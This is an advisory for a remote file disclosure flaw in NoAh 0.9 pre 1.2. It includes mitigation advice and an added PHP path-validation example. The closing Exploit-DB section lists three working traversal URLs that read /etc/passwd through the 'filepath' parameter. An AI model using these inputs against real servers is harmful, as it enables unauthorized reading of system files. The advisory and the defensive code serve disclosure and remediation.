Vendor: NoAh
By: S.P Thanx
CVSS: 7.5 (HIGH)
CWE: Remote File Disclosure
Product Name: NoAh
Affected Version From: NoAh version <= 0.9 pre 1.2
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities

NoAh version 0.9 pre 1.2 is vulnerable to remote file disclosure. Certain files in the NoAh system module templates accept a 'filepath' parameter in the URL; by manipulating it, an attacker can access files outside the intended directory and retrieve sensitive information such as the '/etc/passwd' file.

Mitigation:

To mitigate this vulnerability, update to a patched version of NoAh or apply security measures that restrict access to sensitive files. Also review and validate user input to prevent directory traversal attacks.
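
One way to validate a 'filepath'-style parameter before serving a file, as an added example that is not NoAh's code and not part of the original advisory. The function name resolve_asset, the asset directory and the extension allow-list are assumptions, and the demo files are constructed; POSIX paths are assumed.

```php
<?php
// Added example, not NoAh source. resolve_asset() and the demo directory are hypothetical.

// Resolve a user-supplied relative path inside $baseDir.
// Returns the canonical path, or null when the request must be refused.
function resolve_asset(string $baseDir, string $requested, array $allowedExt): ?string
{
    // Empty values, null bytes and absolute paths are never valid here.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "../" and symlinks; false means the target does not exist.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Compare canonical paths, with a trailing separator so a sibling such as
    // "assets-old" cannot pass as a child of "assets".
    if (strncmp($full, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Serve only the file types this endpoint exists for.
    $ext = strtolower(pathinfo($full, PATHINFO_EXTENSION));
    return in_array($ext, $allowedExt, true) ? $full : null;
}

// Constructed demo: a temporary asset directory holding one stylesheet.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'asset_demo_' . getmypid();
mkdir($dir . '/css', 0700, true);
file_put_contents($dir . '/css/site.css', "body { margin: 0 }\n");

$requests = ['css/site.css', 'css/../css/site.css', '../../../../../../etc/passwd', '/etc/passwd'];
foreach ($requests as $r) {
    $path = resolve_asset($dir, $r, ['css']);
    // A real handler would answer 404 on null and readfile($path) otherwise.
    printf("%-30s %s\n", $r, $path === null ? 'refused' : 'served');
}

unlink($dir . '/css/site.css');
rmdir($dir . '/css');
rmdir($dir);
```

The containment test runs on the canonical path returned by realpath(), not on the raw parameter, so the decision does not depend on how the traversal sequence was written.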

Exploit-DB raw data:

NoAh <= 0.9 pre 1.2 (filepath) Remote File Disclosure Vulnerabilities
Script : http://sourceforge.net/project/showfiles.php?group_id=131995  /noah0.9_pre1.2.tar.gz/
Exploits :
/noah/modules/nosystem/templates/css_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/js_file.php?filepath=../../../../../../etc/passwd
/noah/modules/nosystem/templates/xml_file.php?filepath=../../../../../../etc/passwd
S.P Thanx To : Tryag.Com[Mahmood_ali] -- Asb-May.Net/bb[Mahmood_ali]

# milw0rm.com [2007-11-28]